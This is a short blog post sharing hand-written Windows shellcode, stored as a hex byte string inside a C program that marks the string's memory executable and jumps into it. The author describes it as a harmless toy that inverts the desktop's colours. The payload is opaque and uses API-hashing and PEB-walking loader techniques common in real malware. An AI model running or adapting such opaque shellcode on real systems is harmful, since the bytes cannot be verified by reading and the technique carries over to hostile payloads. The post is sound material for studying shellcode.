Shellcode to Invert Colors

This is a simple shellcode I wrote for fun. This is pretty useless but still it’s fun to experiment 🙂

screenshot_1

# include <stdlib.h>
# include <stdio.h>
# include <string.h>
# include <windows.h>

/*
 * Title: Shellcode to Invert Colors in your Desktop
 * Author: Osanda Malith Jayathissa (@OsandaMalith)
 * Website: https://osandamalith.com
 * This was strictly made for fun 🙂        
 */
 
int main() {
     char *shellcode = 
        "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xce\x03\x02\x02\x81\xf1\x02\x02"
        "\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
        "\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x99\x01\x05\x05"
        "\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
        "\xec\x10\x53\x56\x57\xb9\x8d\x10\xb7\xf8\xe8\xc7\x05\x05\x05\x8b"
        "\xf0\x68\xa5\x01\x05\x05\xff\xd6\x68\xb2\x01\x05\x05\xff\xd6\x68"
        "\xbc\x01\x05\x05\xff\xd6\xb9\xe0\x53\x31\x4b\xe8\xa6\x05\x05\x05"
        "\xb9\x49\x67\xd2\xbe\x89\x45\xf0\xe8\x99\x05\x05\x05\xb9\xdb\xda"
        "\xeb\xd0\x8b\xf0\xe8\x8d\x05\x05\x05\xb9\x4c\x0c\x02\xae\x89\x45"
        "\xfc\xe8\x80\x05\x05\x05\xb9\xa7\x0b\x59\x08\x89\x45\xf8\xe8\x73"
        "\x05\x05\x05\xb9\xaa\xf7\xb4\x69\x89\x45\xf4\xe8\x66\x05\x05\x05"
        "\x6a\x0a\x8b\xf8\x5b\x68\x09\x05\x55\x05\x6a\x05\x6a\x05\x6a\x05"
        "\xff\xd6\x50\x6a\x01\xff\xd7\x50\x6a\x05\xff\xd7\x50\x33\xc0\x50"
        "\x50\x50\xff\xd6\x50\xff\x55\xfc\x6a\x05\xff\xd6\x50\x6a\x05\xff"
        "\x55\xf8\x6a\x64\xff\x55\xf4\x4b\x75\xcb\x53\xff\x55\xf0\x5f\x5e"
        "\x33\xc0\x5b\xc9\xc3\x33\xd2\xeb\x10\xc1\xca\x0d\x3c\x61\x0f\xbe"
        "\xc0\x7c\x03\x83\xe8\x20\x03\xd0\x41\x8a\x01\x84\xc0\x75\xea\x8b"
        "\xc2\xc3\x8d\x41\xf8\xc3\x55\x8b\xec\x83\xec\x14\x53\x56\x57\x89"
        "\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b\x45\xfc\x8b\x40"
        "\x0c\x8b\x40\x14\x89\x45\xec\x8b\xf8\x8b\xcf\xe8\xd2\xff\xff\xff"
        "\x8b\x70\x18\x8b\x3f\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
        "\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x96\xff\xff\xff\x8b"
        "\x4c\x33\x20\x89\x45\xf8\x33\xc0\x03\xce\x89\x4d\xf0\x89\x45\xfc"
        "\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75\xff\xff\xff"
        "\x03\x45\xf8\x39\x45\xf4\x74\x1c\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
        "\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\x9c\x33\xc0\x5f"
        "\x5e\x5b\xc9\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48\x0f\xb7"
        "\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6\xeb\xdf"
        "\x2b\x05\x05\x05\x32\x05\x05\x05\x39\x05\x05\x05\x6b\x65\x72\x6e"
        "\x65\x6c\x33\x32\x2e\x64\x6c\x6c\x05\x67\x64\x69\x33\x32\x2e\x64"
        "\x6c\x6c\x05\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x05";

    DWORD oldProtect;
    
    wprintf(L"Length : %d bytes\n@OsandaMalith", strlen(shellcode));
    BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
  
    if (!ret) {
        fprintf(stderr, "%s", "Error Occured");
        return EXIT_FAILURE;
    }
  
    ((void(*)(void))shellcode)();
 
    VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect);
  
    return EXIT_SUCCESS;
}

https://github.com/OsandaMalith/Shellcodes/blob/master/invert.c

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s